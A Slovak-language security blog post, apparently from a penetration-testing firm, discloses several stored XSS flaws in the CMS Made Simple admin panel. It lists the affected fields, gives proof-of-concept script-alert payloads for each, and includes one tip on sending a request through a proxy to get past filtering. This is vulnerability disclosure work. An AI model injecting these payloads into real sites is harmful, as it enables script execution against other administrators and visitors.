zranitelnost-cms-made-simple

Odhalili sme zraniteľnosť CMS Made Simple

CMS Made Simple (CMSMS) je voľne dostupný, open source (GPL) content management system (CMS), ktorý poskytuje developerom, programátorom a vlastníkom stránok jednoduchú správu stránky a jej údržbu. Pozreli sme sa bližšie na zraniteľnosť CMS Made Simple a o výsledok sme sa s vami podelili.

Podrobnosti o Made Simple CMS

Používateľ s administrátorským prístupom môže zneužiť chybu typu XSS v administrátorskom paneli a v rozšíreniach. Táto zraniteľnosť existuje z dôvodu nedostatočnej filtrácii používateľom dodaných dát. Zneužitím týchto zraniteľností útočník získa možnosť spustiť vlastný klientský kód u iných používateľov. To môže spôsobiť vykonanie rôznych akcií pod účtom iného administrátora. Tiež heslá sú uložené ako osolený MD5 hash.

Zranitelnosti

Payload: <script>alert(document.domain)</script>

Popis: Po vložení payloadu do vstupu je potrebné stránku znovu načítať aby sa payload vykonal

Stored XSS v manage shortcuts

Payload: <script>alert(document.domain)</script>

Parameter: name

Stored XSS v global settings, content editing settings, maintenance mode

Payload: <script>alert(document.domain)</script>

.

Stored XSS v global settings

Payload: <script>alert(1)</script>

Parameter: global metadata

Popis: Prejaví sa aj na stránke pre návštevníkov

Stored XSS v title článku

Payload: XSS &lt;script>alert(document.domain)&lt;/script>

Popis: Prejaví sa v admin prostredí a obsah článku sa prejaví aj na stránke pre návštevníkov. Tu ale treba modifikovať request cez proxy, pretože stránka pred odoslaním ošetrí niektoré znaky.

Stored XSS v settings - content manager

Payload: <script>alert(document.domain)</script>

Keďže vývojári sa rozhodli neopraviť nahlásené zranitelnosti, najlepším odporúčaním by bolo asi prejsť na iné - pravidelne aktualizované CMS, ako napríklad Wordpress. Ak si nie ste istý bezpečnosťou vášho systému, tak vám s bezpečnosťou radi pomôžeme.

O autorovi

Tomáš Volný
Etický hacker
Môj prvý hack? Obídenie prihlasovacej obrazovky Windows, keď som mal sedem. Snaha mojich rodičov, zamedziť mi prístup k modrej obrazovke, bola márna. Neskôr som sa zabával s programovaním na profesionálnej úrovni. Nebolo to však ono. Kaziť veci je totiž omnoho väčšia zábava. A tak som začal pracovať v Citadelo, kde ma za to navyše aj platia! Dream job :).
Zobraziť viac od autora

Podobné blogy

Bezpečnosť na internete - Viete sa správať v online priestore bezpečne?

blog |
Priemerný človek strávi na internete každý deň 3 hodiny a 20 minút. Okrem užitočných informácií a zábavy ale na nás čaká v online svete aj veľké množstvo hrozieb.
Zobraziť

Citadelo na novom a ešte bezpečnejšom webe

Blog | | Michaela Gallee
Naša požiadavka na bezpečný web sa môže niekomu zdať prehnaná, nie sme predsa svetová banka. To však nič nemení na tom, že našou víziou je bezpečný internet a preto naša priorita bola kladená na bezpečnosť.
Zobraziť

Čo sú cookies, na čo slúžia a máme sa ich báť?

Blog | | Tomáš Melicher
Ešte stále neviete čo sú cookies? Prečo ich vidíte takmer na každej stránke, a prečo s nimi musíte súhlasiť, aj keď nechcete? Prečítajte si článok o tom, na čo slúžia cookies vo webových prehliadačoch aj o tom, ako súvisia s internetovou bezpečnosťou.
Zobraziť

Ako si objednať pentest- kompletný návod

Blog | | Martin Hanic
Hoci ľuďom z IT bezpečnostnej branže môže táto otázka pripadať rovnako triviálna ako "Ako si objednať nabíjačku na telefón", pre mnohých však spísanie objednávky na pentest predstavuje podobnú úlohu ako navrhnutie jadrovej elektrárne.
Zobraziť